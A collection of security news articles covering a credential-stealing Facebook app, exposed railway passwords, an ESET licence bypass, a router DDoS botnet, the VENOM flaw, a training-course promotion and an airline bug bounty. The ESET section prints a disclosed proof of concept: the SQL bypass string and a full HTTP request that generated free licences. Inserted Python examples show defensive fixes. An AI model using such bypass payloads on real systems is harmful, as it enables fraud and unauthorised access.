Today everybody wants to know: who visited my Facebook profile? Who unfriended me on Facebook? Who saw my Facebook posts? And many other things that Facebook does not offer by default.

So many Facebook users go looking for software that promises to do exactly this, and fall victim to it. Attackers exploit this weakness and routinely design malicious programs to victimize a broad audience.

Below I disclose the reality behind one such program, cleverly designed to trick Facebook users into believing it is genuine.


UnfriendAlert, a free application that notifies you whenever someone removes you from the Facebook friend list, has been found collecting its users' Facebook credentials.

UnfriendAlert Stealing your Facebook Credentials:

Security researchers at Malwarebytes have warned users of the UnfriendAlert app, saying that the notorious app asks users to log in with their Facebook credentials to activate its unfriend monitoring and alert service for their Facebook profile.

Facebook provides an OAuth-based login API for third-party applications, so users never need to hand their Facebook credentials to those applications. You should therefore never submit your Facebook password to any third-party service or desktop software, whatever the reason given.

Once you enter your login credentials, UnfriendAlert sends them to the website "yougotunfriended.com", which is owned by the attackers.

Late last month, UnfriendAlert was also classified as a potentially unwanted program (PUP): it displays unwanted advertisements and deceptively installs other malicious software and free apps when you visit certain web pages in Chrome, Firefox or Internet Explorer, in a way that prevents you from blocking them.

Uninstall UnfriendAlert and Change your Password Now!

Users are therefore advised to uninstall the UnfriendAlert app from their computers and, besides removing it, to change their Facebook password as soon as possible. You can do this under "Settings > Password > Edit."

Always do some research before installing any third-party application, as a single mistake could compromise your online security and privacy in various ways.


The Weakest Link In the Information Security Chain is still – Humans.

And this story proves that fact right once again.

One of London's busiest railway stations unwittingly exposed its system credentials during a BBC documentary. The sensitive credentials, printed out and attached to the top of a station controller's monitor, were aired on Wednesday night on the BBC.

What could be even worse?


If you think the credentials were only on screen for a moment or a few seconds, then you have yet to grasp the extent of their stupidity.

The login credentials were visible for about 44 minutes in the BBC documentary "Nick and Margaret: The Trouble with Our Trains" on Wednesday night, which featured Nick Hewer and Margaret Mountford, the two business experts famous for their supporting roles on The Apprentice.

The documentary was available on YouTube, but has since been removed due to security concerns.

While talking about the concerns of the British railway network, the duo walked into London Waterloo's control room where these sensitive credentials were seen stuck to a monitor of a system.

A screenshot of the offending monitor with the machine-generated login was captured and is shown above. The screenshot points to a particular signaller's workstation, whose control desk appears to be running software that controls signals and trains on the final approach to Waterloo station.

Now that is a great way to keep passwords, isn't it? I mean, what is the point of putting a password on a device if you stick it on top of that very device?

This shows that we are only human. Remembering so many personal passwords for our different online accounts, and then the passwords of others on top of that: ah, quite a tough job.

Okay, now let’s come to another security concern. What would you expect next?

Password3. Wow! Isn't this a great password?


I mean, at least keep a strong password that takes some time to guess and crack. Password3 could be on the list of the top ten weakest passwords.

The incident occurred a few days after news broke that the computer systems controlling the railway signalling system in the United Kingdom could potentially be hacked by cyber criminals to cause oncoming trains to crash into one another at high speed.

However, the blunder of accidentally revealing passwords in an interview, video or news broadcast is nothing new.

Last year, the World Cup security centre’s internal Wi-Fi passwords for the FIFA World Cup 2014 were broadcast live. Also, French TV network TV5Monde failed to keep its passwords secret and revealed a collection of the TV station’s usernames and passwords live on TV.
Vulnerability in ESET NOD32 Licence Activation system generates unlimited usernames and passwords for free



A security researcher has discovered a vulnerability in the ESET Nod32 Antivirus licence authentication system that generates free licences (username and password)

With so many worms and trojans in the wild, every computer user wants an antivirus on their PC, and it would be even nicer to have the paid version of an antivirus for free. No, this is not a giveaway: a researcher has discovered a serious vulnerability in the ESET Nod32 licensing system which allowed attackers to use the paid product for a full year without paying.
Security researcher Mohamed Abdelbaset Elnoby has discovered a vulnerability in the authentication of the ESET Nod32 licensed version that allows potential attackers to generate millions of usernames and passwords without a hitch.
Elnoby has dubbed the authentication bug "hilarious", and he states: "Hilarious Broken Authentication bug I found in ESET website specifically in their 'Antivirus Product Activation Process' that allowed me to generate millions of valid paid Licenses of 'ESET Nod32 Antivirus' as per their description 'Our award-winning security software offers the most effective protection available today' for free."
The unlimited generation of usernames and passwords for ESET Nod32 is caused by a broken authentication bug. While most applications require authentication to gain access to private information or to execute tasks, not every authentication method provides adequate security. Negligence, ignorance, or simple underestimation of security threats often result in authentication schemes that can be bypassed by simply skipping the login page and directly calling an internal page that is supposed to be accessible only after authentication has been performed. Elnoby discovered that there are several ways of bypassing the ESET Nod32 authentication, such as:
  • Direct page request (forced browsing)
  • Parameter modification
  • Session ID prediction
  • SQL injection
The PoC of the bug is given below:
[*] Vulnerability Type : A2 – Broken Authentication and Session Management
[*] URL / Service: http://eu-eset.com/me/activate/reg/
[*] Vulnerable Parameter(s) / Input(s): “serial” (Product Key field)
[*] Payload / Bypass string: ' OR '''
[*] Request full dump:
POST /me/activate/reg/ HTTP/1.1
Host: eu-eset.com
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://eu-eset.com/me/activate/
Cookie: [*]
Connection: keep-alive
Content-Type: multipart/form-data; boundary=---------------------------25242107630722
Content-Length: 885

-----------------------------25242107630722
Content-Disposition: form-data; name="serial"

' OR '''
-----------------------------25242107630722
Content-Disposition: form-data; name="country"

20
-----------------------------25242107630722
Content-Disposition: form-data; name="firstname"

Mohamed
-----------------------------25242107630722
Content-Disposition: form-data; name="lastname"

Abdelbaset
-----------------------------25242107630722
Content-Disposition: form-data; name="company"

Seekurity
-----------------------------25242107630722
Content-Disposition: form-data; name="email"

SymbianSyMoh@Outlook.com
-----------------------------25242107630722
Content-Disposition: form-data; name="phone"

12345678911
-----------------------------25242107630722
Content-Disposition: form-data; name="note"

-----------------------------25242107630722--
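As an added, defender-side illustration (not ESET's code; their actual query and backend are not public, so this does not claim to reproduce the bypass), here is a licence-activation lookup written the unsafe way and the hardened way, fed the bypass string from the request above. The table layout, the key format and the in-memory sample data are assumptions constructed for the example.

```python
# Added example, not ESET's code: a licence-activation lookup written the unsafe way
# (the form field pasted into the SQL text) and the hardened way (format check, bound
# parameter, single-use key, fail closed). Table layout and key format are assumptions.
import re
import sqlite3

# The bypass string from the PoC request above, exactly as sent in the "serial" field.
BYPASS_STRING = "' OR '''"

# Assumed product-key format: five groups of four upper-case letters or digits.
SERIAL_RE = re.compile(r"[A-Z0-9]{4}(-[A-Z0-9]{4}){4}")


def build_query_unsafe(serial):
    """The defect: whatever the user typed becomes part of the SQL statement, so the
    quotes in the bypass string close the literal and turn OR into an operator.
    What a database then does with the mangled statement depends on the engine,
    which is exactly why the text must never be assembled this way."""
    return f"SELECT id FROM licenses WHERE serial = '{serial}' AND activated = 0"


def is_well_formed_serial(serial):
    """First line of defence: refuse anything that does not look like a product key
    before it touches the database. The bypass string fails here immediately."""
    return SERIAL_RE.fullmatch(serial) is not None


def activate(conn, serial):
    """Hardened handler. The value is bound as a parameter, so it can only match a
    serial stored verbatim; the UPDATE consumes the key atomically so one key yields
    one licence; and any database error counts as a failed activation (fail closed).
    Returns True only when an unused key was activated."""
    if not is_well_formed_serial(serial):
        return False
    try:
        cur = conn.execute(
            "UPDATE licenses SET activated = 1 WHERE serial = ? AND activated = 0",
            (serial,),
        )
        conn.commit()
    except sqlite3.Error:
        conn.rollback()
        return False
    return cur.rowcount == 1


def make_sample_db():
    """Constructed in-memory licence table with a single unused key (sample data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE licenses (id INTEGER PRIMARY KEY, serial TEXT UNIQUE, "
        "activated INTEGER NOT NULL DEFAULT 0)"
    )
    conn.execute("INSERT INTO licenses (serial) VALUES ('AB12-CD34-EF56-GH78-JK90')")
    conn.commit()
    return conn


if __name__ == "__main__":
    db = make_sample_db()
    print("unsafe statement built from the bypass string:")
    print("  " + build_query_unsafe(BYPASS_STRING))
    for key in (BYPASS_STRING, "AB12-CD34-EF56-GH78-JK90", "AB12-CD34-EF56-GH78-JK90"):
        print(f"activate({key!r}) -> {activate(db, key)}")
```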
Each time someone used the above authentication bypass string, he or she could generate a paid ESET Nod32 licence valid for one year, which normally costs $29.00 per user, for free. ESET has acknowledged the vulnerability and has now patched the website. It also awarded Elnoby a bug bounty of a one-year free licence for his efforts. The bug may not be that hilarious, but the bounty awarded to him sure seems "hilarious", because Elnoby must have saved ESET quite a fortune.
The video of the PoC is given below:





Small office and home office (SOHO) routers are an increasingly common target for cybercriminals, not because of any vulnerability, but because most routers are loosely managed and often deployed with default administrator credentials.

A new report suggests that attackers are using a large botnet of tens of thousands of insecure home and office routers to launch Distributed Denial-of-Service (DDoS) attacks.

Security researchers from DDoS protection firm Incapsula uncovered the router-based botnet, which is still largely active, while investigating a series of DDoS attacks against its customers that have been underway since at least December 2014.

Over the past four months, the researchers recorded malicious traffic targeting 60 of its clients coming from some 40,269 IP addresses belonging to 1,600 ISPs around the world.

Almost all of the infected routers that were part of the botnet appear to be ARM-based models from the California-based networking company Ubiquiti Networks, sold across the world.

This initially led the researchers to believe that the cyber criminals were exploiting a firmware vulnerability in the routers.

What’s revealed in the close inspection?


However, this assumption proved wrong on closer inspection, which revealed that:
  • All of the compromised routers were remotely accessible on the default ports (via HTTP and SSH)
  • Almost all of them still used the vendor-provided login credentials

This opens the door to man-in-the-middle (MitM) attacks, eavesdropping on all communication and cookie hijacking, and lets attackers reach other devices on the local network, such as CCTV cameras.

Router makers design their devices so that they can be connected easily, and therefore give every unit the same administrator credentials without prompting the user to change them. Moreover, instead of letting users opt in to remote administration, manufacturers enable it by default.
"Given how easy it is to hijack these devices, we expect to see them being exploited by additional perpetrators," researchers wrote. "Even as we conducted our research, the Incapsula security team documented numerous new malware types being added—each compounding the threat posed by the existence of these botnet devices."

A variety of DDoS malware involvement:


The security firm also discovered a variety of DDoS malware programs, including MrBlack, Dofloo, and Mayday, installed on the insecure devices to carry out other malicious tasks such as:

  • Redirect victims to malicious websites
  • Intercept victims’ online banking sessions
  • Inject rogue and malicious advertisements into the victim's Web traffic
  • Steal login credentials for various online accounts
  • Perform other illegal activities


The question remains — Who is behind this botnet?


Researchers found some indirect evidence linking the router-based botnet to the notorious hacking group Lizard Squad, a group that has used compromised routers to launch DDoS attacks against Sony's PlayStation and Microsoft's Xbox networks.

Back in January, Lizard Squad set up a DDoS-for-hire service called Lizard Stresser that was using hacked home routers. However, Incapsula believes that it’s not Lizard Stresser because it is powered by different malware programs.

The botnet comprises devices in 109 countries, with Thailand (64 percent), Brazil, and the United States being the three most affected nations. The firm also identified 60 command and control servers used by the criminals to control the botnet, most of them located in China and the U.S.

The bottom line:


Users should also keep their devices safe by making sure that they:

  • Disable all remote access to the devices unless it is specifically needed
  • Change the default login credentials for their routers to prevent unauthorized access
  • Keep the router firmware up to date


Compromised routers are nothing new. Some manufacturers, including Linksys, Asus, D-Link, Micronet, Tenda, and TP-Link, have been known to ship vulnerable devices. Incapsula has informed the specific router manufacturers and the relevant ISPs about the insecurity of the routers they market.

Just after a new security vulnerability surfaced on Wednesday, many tech outlets started comparing it with HeartBleed, the serious security flaw uncovered last year that rendered communications with many well-known web services insecure, potentially exposing millions of plain-text passwords.

But don't panic. Though the recent vulnerability has a more frightening name than HeartBleed, it is not going to cause as much damage as HeartBleed did.

Dubbed VENOM, short for Virtualized Environment Neglected Operations Manipulation, it is a virtual machine security flaw uncovered by security firm CrowdStrike that could, in theory, expose most data centers to malware attacks.

Yes, the risk from the Venom vulnerability is theoretical, as no real-world exploitation has been seen yet, whereas last year's HeartBleed bug was practically exploited by attackers an unknown number of times, leading to the theft of critical personal information.

Now let’s know more about Venom:


Venom (CVE-2015-3456) resides in the virtual floppy drive code used by a number of computer virtualization platforms and, if exploited, could allow an attacker to escape from a guest virtual machine (VM) and gain full control of the operating system hosting it, as well as of any other guest VMs running on the same host machine.

According to CrowdStrike, this roughly decade-old bug was discovered in the open-source virtualization package QEMU, affecting its Virtual Floppy Disk Controller (FDC) that is being used in many modern virtualization platforms and appliances, including Xen, KVM, Oracle's VirtualBox, and the native QEMU client.

Jason Geffner, a senior security researcher at CrowdStrike who discovered the flaw, warned that the vulnerability affects all versions of QEMU going back to 2004, when the virtual floppy controller was first introduced.

However, Geffner also added that so far there is no known working exploit for the vulnerability. Even so, Venom is critical and disturbing enough to be considered a high-priority bug.

What successful exploitation of Venom requires:

For successful exploitation, an attacker on the guest virtual machine would need sufficient permissions to access the floppy disk controller's I/O ports.

On a Linux guest, that means either root access or elevated privileges. On a Windows guest, however, practically anyone would have sufficient permissions to access the FDC.

However, Venom and HeartBleed are hardly comparable. Where HeartBleed allowed attackers to probe millions of systems, the Venom bug simply could not be exploited at the same scale.

Flaws like Venom are typically used in highly targeted operations such as corporate espionage, cyber warfare or other targeted attacks of that kind.

Did Venom poison cloud services?


Potentially more concerning is that most of the large cloud providers, including Amazon, Oracle, Citrix, and Rackspace, rely heavily on QEMU-based virtualization and are therefore vulnerable to Venom.

However, the good news is that most of them have resolved the issue, assuring that their customers needn't worry.
"There is no risk to AWS customer data or instances," Amazon Web Services said in a statement.
Rackspace also said the flaw does affect a portion of its Cloud Servers, but assured its customers that it has "applied the appropriate patch to our infrastructure and are working with customers to remediate fully this vulnerability."

Microsoft's Azure cloud service, on the other hand, uses Microsoft's own hypervisor technology, and its customers are therefore not affected by the Venom bug.

Meanwhile, Google also assured that its Cloud Service Platform does not use the vulnerable software, thus was never vulnerable to Venom.

Patch Now! Protect yourself


Both Xen and QEMU have rolled out patches for Venom. If you're running an earlier version of Xen or QEMU, upgrade and apply the patch.

Note: All versions of Red Hat Enterprise Linux, which include QEMU, are vulnerable to Venom. Red Hat recommends that its users update their systems using the command "yum update" or "yum update qemu-kvm."

Once done, you must power off all your guest virtual machines for the update to take effect, and then start them again. Remember that merely rebooting the guest operating system is not enough, because the guest would still be running on the old QEMU binary.
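That power-off requirement can be verified rather than assumed. The following is an added example, not from the article nor from Red Hat or QEMU tooling: on a QEMU/KVM host such as the Red Hat case above, it lists guest processes that are still executing the pre-update binary, using the Linux /proc convention that the /proc/<pid>/exe link of a process whose executable has been replaced on disk ends in " (deleted)". The /proc mirror it builds for offline use is constructed sample data.

```python
# Added example, not part of the article nor of Red Hat or QEMU tooling: after
# "yum update qemu-kvm", confirm that no guest is still running on the old QEMU
# binary. On Linux, /proc/<pid>/exe is a symlink to the running executable, and once
# a package update has replaced that file the link target ends in " (deleted)".
# A guest that was only rebooted from inside keeps its original qemu process, so it
# shows up here until it is powered off and started again.
import os
import sys
import tempfile


def stale_qemu_processes(proc_root="/proc"):
    """Return sorted [(pid, exe_target)] for qemu* processes whose executable on disk
    has been replaced since they started. Run as root for a complete view; entries we
    cannot read (process gone, or not ours) are skipped."""
    stale = []
    for entry in os.listdir(proc_root):
        if not entry.isdigit():
            continue
        pid_dir = os.path.join(proc_root, entry)
        try:
            with open(os.path.join(pid_dir, "comm")) as f:
                comm = f.read().strip()          # short process name, e.g. qemu-kvm
            exe = os.readlink(os.path.join(pid_dir, "exe"))
        except OSError:
            continue
        if comm.startswith("qemu") and exe.endswith(" (deleted)"):
            stale.append((int(entry), exe))
    return sorted(stale)


def all_guests_on_new_binary(proc_root="/proc"):
    """True when every qemu process already runs the patched on-disk binary."""
    return not stale_qemu_processes(proc_root)


def make_sample_proc(include_stale=True):
    """Constructed mirror of /proc for offline demonstration (sample data): one guest
    still on the deleted binary (when include_stale), one restarted guest, and an
    unrelated process whose binary was also replaced but which is not qemu."""
    root = tempfile.mkdtemp(prefix="fakeproc-")
    procs = [("202", "qemu-kvm", "/usr/libexec/qemu-kvm"),
             ("303", "sshd", "/usr/sbin/sshd (deleted)")]
    if include_stale:
        procs.append(("101", "qemu-kvm", "/usr/libexec/qemu-kvm (deleted)"))
    for pid, comm, exe in procs:
        os.mkdir(os.path.join(root, pid))
        with open(os.path.join(root, pid, "comm"), "w") as f:
            f.write(comm + "\n")
        os.symlink(exe, os.path.join(root, pid, "exe"))  # dangling link is fine here
    return root


if __name__ == "__main__":
    # With no argument the live /proc is scanned; pass a directory to scan a mirror.
    root = sys.argv[1] if len(sys.argv) > 1 else "/proc"
    for pid, exe in stale_qemu_processes(root):
        print(f"pid {pid} still runs {exe}: power the guest off and start it again")
    sys.exit(0 if all_guests_on_new_binary(root) else 1)
```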


Target’s data breach is a chilling example: After the widely publicized hack, 12% of loyal shoppers no longer shop at that retailer, and 36% shop at the retailer less frequently. For those who continue to shop, 79% are more likely to use cash instead of credit cards. 

According to DeMeo, Vice President of Global Marketing and Analytics at Interactions Marketing Group, shoppers who use cash statistically spend less money, hurting the company. Indeed, 26% say they will knowingly spend less than before.

So, why did Target get hacked?

There could be two reasons: either they (or one of their vendors) had gaps in their IT security implementation, or their employees had not been put through effective security awareness training. In Target's case, an employee at one of their vendors was tricked into clicking on a phishing link.

Now, let's have a look at what Target affirmed:
"Target was certified as meeting the standard for the payment card industry in September 2013. Nonetheless, we suffered a data breach."
The above statement was given by Target's President, Chairman and Chief Executive Officer (CEO), Gregg Steinhafel. The standard he is talking about here is known as PCI compliance, mandated by the Payment Card Industry.

PCI data security standard (PCI DSS) is a standard implemented to create a secure environment for electronic payments. So, any organization that is involved in payment card transactions must ensure that they are compliant with PCI DSS.

However, simply being compliant does not guarantee your network is secure. Being compliant is a baseline that you are going to build your network security on top of.

Compare it to this: saying "I have passed my PCI audit, so I am secure" is like saying "I have a driver's license, so I am a safe driver."

In both the situations, your security is not confirmed if you do not educate yourself properly.

That's right – Despite having all the technical controls in place that safeguard your customers’ payment card information, the PCI standard also requires you to educate your employees about the PCI Data Security Standards.

Education is an essential step, no matter what people in the industry may say about Cyber Security Awareness Training. You should roll out an effective training program to help protect your organization against the threats you face every day.

A few weeks back, we introduced KnowBe4's Kevin Mitnick Security Awareness Training Program, which aims to make employees understand the mechanisms of phishing, spear phishing, spam, malware and social engineering, and then to apply this knowledge in their day-to-day jobs.

This time, we look at the module called: PCI Compliance Simplified

I worked my way through the PCI DSS Training module offered by KnowBe4. It's a web-based interactive training using real examples of credit card fraud, and how to protect your network against such attacks.

KnowBe4 developed a clear and simple training module known as PCI Compliance Simplified 2015, which is specially designed to offer companies and merchants the in-depth knowledge necessary to make decisions regarding their PCI compliance efforts.

Being compliant with PCI DSS, you have the basics in place to keep your customers' valuable payment data safe and secure and out of the hands of fraudsters. It is also required to keep your merchant account and be able to accept credit cards.

Company employees who handle PCI compliance and have completed this excellent on-demand, web-based course will leave with:
  • a strong understanding of the intent behind each PCI requirement
  • secure habits and best practices that promote a secure environment
  • knowledge of how to apply them to their business environment
  • knowledge of how to stay PCI compliant with the new PCI DSS 3.0 standard
  • knowledge of how to avoid a data breach
"This course is for anyone that’s responsible for handling credit cards in your organization and qualifies as Security Awareness Training. Especially owners, the CFO or Controller, managers and IT people in charge of credit card processing should take this course," the course web page says.
The idea behind KnowBe4's PCI Compliance Simplified training module is that your business is protected at its best when every employee that may touch cardholder's data understands the importance of managing that data securely.

Along with the PCI Compliance Simplified training, KnowBe4 also offers a training module for any employee that is handling credit cards and needs to learn how to safely handle cards.

It's called Basics Of Credit Card Security and is meant for all employees who are taking orders on the phone, swipe cards on terminals or through devices connected to smartphones. It teaches employees to handle credit card information securely to prevent data breaches.

It covers the different types of cards and which specific elements attackers are after, and explains how malware such as keyloggers, password crackers and spyware can endanger credit card information.

Employees are taught the rules for paper copies of credit card data and things to remember during data entry, including things NOT to do, such as sending credit card information by email or text. A quiz concludes this 20-minute course.

These courses are an incredible time saver for busy managers. So if you want your business to be better protected and your customers' data to be secured, find out how affordable this is. Go to KnowBe4 and ask them for a quote. You will be pleasantly surprised.




If you are a security researcher and fond of traveling from one conference to another, then United Airlines' bug bounty program will be of great interest to you.

United Airlines has launched a new bug bounty program inviting security researchers and bug hunters to report vulnerabilities in its websites, apps and web portals.

Bug bounty programs are very common among technology firms, including Google and Facebook, which offer hundreds of thousands of dollars in rewards for exposing security flaws and errors in their products.

So, what is different about United Airlines' new bug bounty?


The most interesting part of this bug bounty program is that, instead of offering cold, hard cash, United Airlines is offering air miles as the reward for your findings.

Let’s see what United Airlines says about its bug bounty program:


"At United, we take your safety, security and privacy seriously. We utilize best practices and are confident that our systems are secure," said the company.
"We believe that this program will further bolster our security and allow us to continue to provide excellent service. If you think you have discovered a potential bug that affects our websites, apps, and online portals, please let us know. If the submission meets our requirements, we'll gladly reward you for your time and effort."

The classification of the bug bounty rewards:


The rewards range from 50,000 air miles to 1 million air miles. The more severe the vulnerability you discover, the more miles you win.
  • Low-severity bugs, including cross-site scripting, cross-site request forgery and third-party issues affecting United, are worth 50,000 air miles.
  • Medium-severity flaws, including authentication bypass, denial-of-service attacks, brute-force attacks and security issues that could lead to the disclosure of personally identifiable information, are worth 250,000 air miles per vulnerability.
  • The top prize, a million-mile payout, goes to researchers who find high-severity vulnerabilities that would lead to remote code execution on United's online properties.


However, there are some important rules by United Airlines that are worth keeping in mind too.

One important rule to note is that the bug bounty program specifically does not cover vulnerabilities in its "onboard Wi-Fi, entertainment systems or avionics", so don't go digging for bugs while you are in flight.

This does not mean that United Airlines does not consider such vulnerabilities serious, but it really does not want to encourage researchers to hunt for bugs in a plane flying at 30,000 feet.

Don’t mess with in-flight systems


United recently gave one example of how seriously it takes this part of the small print, when it removed security researcher Chris Roberts from a flight over a joke tweet he made about possible in-flight vulnerabilities.

Accidentally crashing an airline's ticketing server means lost revenue; accidentally crashing a flight's avionics could mean lost lives. So, according to the fine print, such attempts may be treated as grounds for criminal investigation.

Moreover, vulnerabilities that only exist on unsupported operating systems or browsers are not eligible for the bounty program.

Still, it is good to see United Airlines welcoming vulnerability reports from researchers and rewarding them for their work; it shows the company's keenness to protect its customers' privacy and to keep attackers out of its databases and other sensitive data.